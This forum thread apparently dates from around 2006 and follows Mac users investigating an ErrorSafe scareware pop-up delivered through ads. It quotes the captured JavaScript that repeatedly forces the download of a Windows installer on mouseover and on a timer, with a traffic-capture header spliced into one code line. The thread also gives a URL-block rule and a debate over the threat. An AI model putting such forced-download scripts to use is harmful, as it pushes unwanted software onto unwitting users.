[workerbee]

Hmmm... about 2 hours ago, my Mac started displaying this strange window.



Anyone know what this is about?
I feel like I got myself a virus - even if it's possibly just a JavaScript window in OmniWeb, talking about my "Registry".

[workerbee]

I really wonder how I stumbled into this one.




BTW, this is what happens when one clicks on the "Cancel" button... because OmniWeb can't be quit normally.



And this is the URL all this ridiculuous cr*p came from:

Code:
http://www.errorsafe.com/pages/scanner/?aid=adtiger&lid=in&ax=1&ex=1&ed=2

and

Code:
http://www.errorsafe.com/pages/scanner/index.php?aid=adtiger_ch_en_ed2&lid=in&ex=1&p=&ax=1&h=

Note "adtiger" in the first and "adtiger_ch_en_ed2" in the second URL. This could be quite clever: an ad for Tiger users logged in in Switzerland (ch), using an english browser or oprating system (en).

[Dark Helmet]

Is it just a pop-up window in Safari?

[workerbee]

Originally Posted by Dark Helmet

Is it just a pop-up window in Safari?

Yep, but it's a clever one, IMHO.
I revisited the stupid site, sniffing my port 80 traffic with tcpflow to see the JavaScript behind it all -- now OmniWeb automatically downloaded "ErrorSafeFreeInstall.exe" without me clicking on any link.

This is the JS behind the download:

Code:
<SCRIPT LANGUAGE="JavaScript">
.redirect_if_exists("ErrorSafe Scanner");
.try{
..moveTo(0,0);
.}catch(e){
.}
.x=screen.width;
.y=screen.height;
.try{
..resizeTo(x,y);
.}catch(e){
.}


var instURL = 'http://download.errorsafe.com/files/installers/ErrorSafeFreeInstall.exe';
  
    // Prompt for download only once - on mouse over
    function doDownload1() {
        if(document.hover.hf
066.244.254.063.00080-192.168.100.111.50356: lag.value==0) {
            document.location.href=instURL;
            document.hover.hflag.value=10;
        }
    }

    // Prompt for download continuously - on mouse over
    function doDownload2() {
        document.location.href=instURL;
    }
    
    // Prompt for download on frequent intervals - on mouse over
    function doDownload3() {
        if(document.hover.hflag.value==0) {
            document.location.href=instURL;
            document.hover.hflag.value=10;
        }
        currentTime = new Date();
        val=currentTime.getSeconds()
..if((val%5)==0) {
            document.location.href=instURL;
..}
    }

</script>

[JKT]

Have you reported this to OmniGroup?

Is this popping up even with pop-up windows blocked?

[workerbee]

Originally Posted by JKT

Have you reported this to OmniGroup?

Is this popping up even with pop-up windows blocked?

Yes, and yes.
You can avoid this idiotic stuff by entering

Code:
/.*\.errorsafe\.com

into OWs blocked URLs list.

[JKT]

What about Safari? I would deactivate the Open in Safe applications option before trying. While this particular soft-/mal- ware is obviously for Windows, the Javascript could potentially be used to download more malicious files on the Mac too, so it is probably worthwhile drawing Apple's attention to it.

[Mediaman_12]

Safari would popup that "whatever.exe is an application" type sheet from the download window, so you would have a good idea of what's going on.
IMHO this is why Apple shouldn't be going blindly down the 'Seamless Windows virtualisation' route, where you can easily run almost all Windows exe's out of the box.

[TETENAL]

This is just a JavaScript dialog. It is not a pop-up window, so pop-up blocking doesn't (and shouldn't) prevent this. It's just like the "You have a new private message" dialog you get here in this forum. There is nothing malicious/virus/malware going on here. Worst that could happen would be some crap downloading to your Desktop.

OmniWeb should make it more obvious that this is a JavaScript dialog maybe, and not a dialog that came from OmniWeb itself or the system.

[workerbee]

Originally Posted by TETENAL

There is nothing malicious/virus/malware going on here. Worst that could happen would be some crap downloading to your Desktop.

Please excuse me for disagreeing a little here: I do find this to be very malicious, in fact. I can readily imagine a windows discussion board, 10 years ago, and someone saying �There is nothing malicious/virus/malware going on here.�

I wonder what would have happened if my mother, or even my girlfriend, had surfed the macnn forums (where I probably picked this up), suddenly found this insidious window popping up, unable to quit the application, and it automatically downloading some code after clicking the cancel button. Code which may, or may not, then start auto-executing on the Mac -- it could have been something else besides an .exe. It could even be a shell script or something parading as an exe, just so we clever types think �Ha! You stupid Windows guys will not get *me*, I'm on a Mac, I'm safe!�.

But, of course, I'm panicking

BTW, I'd like to see where this page came from, as I certainly never did consciously go anywhere near it. My OW history file shows forums.macnn.com adresses just before the errorsafe URL. Does anyone know where OW 5.5 SP7 keeps its cache files?

Edit: found the Cache files.

[kick52]

the bastards.

[ghporter]

Yeah, it's malicious, though not damaging (which is what I think TETENAL meant by "malicious"). I think Firefox also blocks downloads of such files, or at least warns you (which should be a dead giveaway for most people). I'll have to check.

Any idea what site you got this little PITA from?

[workerbee]

Originally Posted by ghporter

Any idea what site you got this little PITA from?

Unfortunately, despite searching through the OS cache files, I've not not found the original link. Unless they've got some fancy time-shifting code going on, there's a big chance it came from here, forums.macnn.com. The 10 to 15 last entries in the history.plist before errorsafe first pops up are all forum URLs.

This is a suspicious URL I found:

Code:
http://locator1.cdn.imagesrvr.com/sites/errorsafe.com/www/pages/scanner/libs/checksoft.js

[the macimum]

Maybe you should turn on the pop-up blocker, and get virex.

[workerbee]

Originally Posted by the macimum

Maybe you should turn on the pop-up blocker, and get virex.

Both will not do anything in this case, as was stated a few postings above.

[TETENAL]

Originally Posted by workerbee

Please excuse me for disagreeing a little here: I do find this to be very malicious, in fact.

It was just a JavaScript-dialog, nothing more. That can't do anything other than display a message. Copy the following, paste it into the address field of your browser and press return.

javascript:alert("If you press OK the world is coming to an end.")

Does that mean the world is coming to an end? Of course not. It's just a message in a JavaScript dialog box. That company used a JavaScript message dialog to scare people into buying an unnecessary product. That is all. They could just as well have used a pop up window or a JPEG with the screenshot of a window frame. All of those would have been dirty marketing tricks, but none are "malware" or trojans or what you think they are.

Originally Posted by workerbee

I wonder what would have happened if my mother, or even my girlfriend, had surfed the macnn forums (where I probably picked this up), suddenly found this insidious window popping up, unable to quit the application, and it automatically downloading some code after clicking the cancel button.

You don't need JavaScript to automatically download something. You could do the same thing with a pop-up window, frames or a meta refresh tag. This is all not a security problem.

Originally Posted by workerbee

Code which may, or may not, then start auto-executing on the Mac

Code is never auto-executed on the Mac (unless there is a bug, which in this case there isn't). Safari only auto-opens files that are considered 'safe' (which explicitly excludes programs and scripts).

Originally Posted by workerbee

it could have been something else besides an .exe. It could even be a shell script or something parading as an exe, just so we clever types think �Ha! You stupid Windows guys will not get *me*, I'm on a Mac, I'm safe!�.

Yes, you could always accidently download a trojan. There is currently nothing (digital signature discussion notwithstanding) that will protect you from trojans. That's why you don't double-click anything that unexpectedly downloaded from the web. This is basic – and required – media competence today.

Originally Posted by workerbee

BTW, I'd like to see where this page came from, as I certainly never did consciously go anywhere near it. My OW history file shows forums.macnn.com adresses just before the errorsafe URL.

Since this is "advertising" it probably came from the ad server of MacNN.

[tooki]

I want to murder the f***ing ad people. No matter what we tell them, they put junk in circulation.

tooki

[the macimum]

Originally Posted by tooki

I want to murder the f***ing ad people. No matter what we tell them, they put junk in circulation.

tooki

I mean, who doesn't? Except the ad people themselves.

[TETENAL]

I just got the same thing here. Only in awfully bad German.

[Tyler McAdams]

That's for windows though... not too much to worry about.

[eobet]

http://it.slashdot.org/it/06/06/24/1420251.shtml

[workerbee]

Originally Posted by Tyler McAdams

That's for windows though... not too much to worry about.

Don't worry: TETENAL is not worried in the least, because he/she knows that with OS X he/she is perfectly absolutely 100% positively safe & secure from any and all imaginable harm

[workerbee]

Originally Posted by TETENAL

I just got the same thing here. Only in awfully bad German.

Actually, I rather like "Fröste"

Edit: Oh, and did you find this JS pop-up in the least annoying?

[TETENAL]

Originally Posted by workerbee

Edit: Oh, and did you find this JS pop-up in the least annoying?

Yes, I was somewhat annoyed by the JavaScript dialog. MacNN shouldn't partner with scammers.

Originally Posted by workerbee

Don't worry: TETENAL is not worried in the least, because he/she knows that with OS X he/she is perfectly absolutely 100% positively safe & secure from any and all imaginable harm

That's not what I said. I said that a JavaScript dialog poses no threat.

[ghporter]

MacNN probably has less choice about who the adservers put on the pages than you might think. Most online advertisers don't even have a clue where their ads actually go-they pay the adservers to place the ads. That means that adservers are targets for scammers who want to scam anyone they can.

[workerbee]

Originally Posted by TETENAL

That's not what I said. I said that a JavaScript dialog poses no threat.

I know, and of course you're absolutely right.
But you also said

Originally Posted by TETENAL

Code is never auto-executed on the Mac (unless there is a bug, which in this case there isn't). Safari only auto-opens files that are considered 'safe' (which explicitly excludes programs and scripts).

... about which I'm feeling somewhat less secure; don't like stuff like
http://secunia.com/advisories/18963/ or http://www.heise.de/english/newsticker/news/69862

But that's just me

[TETENAL]

Originally Posted by workerbee

I know, and of course you're absolutely right.
But you also said

... about which I'm feeling somewhat less secure; don't like stuff like
http://secunia.com/advisories/18963/ or http://www.heise.de/english/newsticker/news/69862

Those were bugs. I said that "Code is never auto-executed on the Mac (unless there is a bug" This JavaScript dialog however is not based on a bug. The software behaves as it should.